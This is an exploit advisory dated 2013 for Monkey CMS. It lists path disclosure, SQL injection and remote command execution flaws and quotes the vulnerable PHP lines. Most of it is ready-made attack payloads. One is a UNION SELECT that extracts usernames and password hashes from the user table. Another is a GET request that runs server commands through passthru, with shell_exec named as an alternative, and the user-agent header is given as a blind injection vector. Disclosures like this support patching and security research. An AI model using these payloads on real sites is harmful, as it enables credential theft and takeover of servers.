# Exploit Title: Monkey CMS - Multiple Vulnerabilities
# Date: 2013 17 June
# Exploit Author: Yashar shahinzadeh & Mormoroth
# Vendor Homepage: http://www.monkeycms.com/
# Tested on: Linux & Windows, PHP 5.3.10
# Affected Version : All versions
# Contacts: { http://Twitter.com/YShahinzadeh , http://Twitter.com/Mormoroth }
1. Local path disclosure
2. MySQL Injection (Error based)
3. MySQL Injection (Time based blind)
4. Remote command execution
5. More
1. Local path disclosure:
http://site.com/[Path of Monkey CMS]/admincp/phpinfo.php
http://site.com/[Path of Monkey CMS]/admincp/classes/database.php
2. MySQL Injection (Error based):
Vulnerable lines of advancedsearch.php (Lines from 23 through 50):
case 'advancedsearch.php':
$action = $_GET['action'];
$asstart = $_GET['asstart'];
$contentelement = $_GET['contentelement'];
$definitionid = $_GET['definitionid'];
$direction = $_GET['direction'];
$enddate = $_GET['enddate'];
$orderby = $_GET['orderby'];
$perpage = $_GET['perpage'];
$searchid = $_GET['searchid'];
$searchterm = $_GET['searchterm'];
$startdate = $_GET['startdate'];
$typeid = $_GET['typeid'];
Vulnerable lines of advancedsearch2.php (Lines from 23 through 50):
case 'advancedsearch2.php':
$action = $_POST['action'];
$asstart = $_POST['asstart'];
$contentelement = $_POST['contentelement'];
$definitionid = $_POST['definitionid'];
$direction = $_POST['direction'];
$enddate = $_POST['enddate'];
$orderby = $_POST['orderby'];
$perpage = $_POST['perpage'];
$searchterm = $_POST['searchterm'];
$startdate = $_POST['startdate'];
$typeid = $_POST['typeid'];
Exploit (POST request to pages above):
action=search&asstart=0&contentelement=1&definitionid=1 UNION ALL SELECT NULL,CONCAT(0x3a6c70653a,password,0x766763616b68,user_name,0x3a626e743a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM monkey.mcms_user
3. MySQL Injection (Time based blind):
Vulnerable lines of global.php (Lines 456,526):
"insert into guests (ip_address, datetime, user_agent, is_bot, last_page) values ('$ip', '".date("Y-m-d H:i:s")."', '".$_SERVER['HTTP_USER_AGENT']."', '".$ib."', '".selfURL()."')";
Exploit (POST request to pages "index.php","login.php",ETC): Attack is capable of injecting by USER_AGENT
4. Remote command execution:
Vulnerable lines of functions.php (Lines 2272,2273):
$strCommand = "\$p = \$arrayFunctions[$function[0]"."_parameters];";
Exploit (GET request):
http://site.com/[Path of Monkey CMS]/index.php?page=TagIndex&tags=${passthru('dir')}
Note that nny function which can issue server side command can be used instead of passthru(), i.e. shell_exec()
5. More
There were also some unimportant vulnerabilities we haven't mentioned.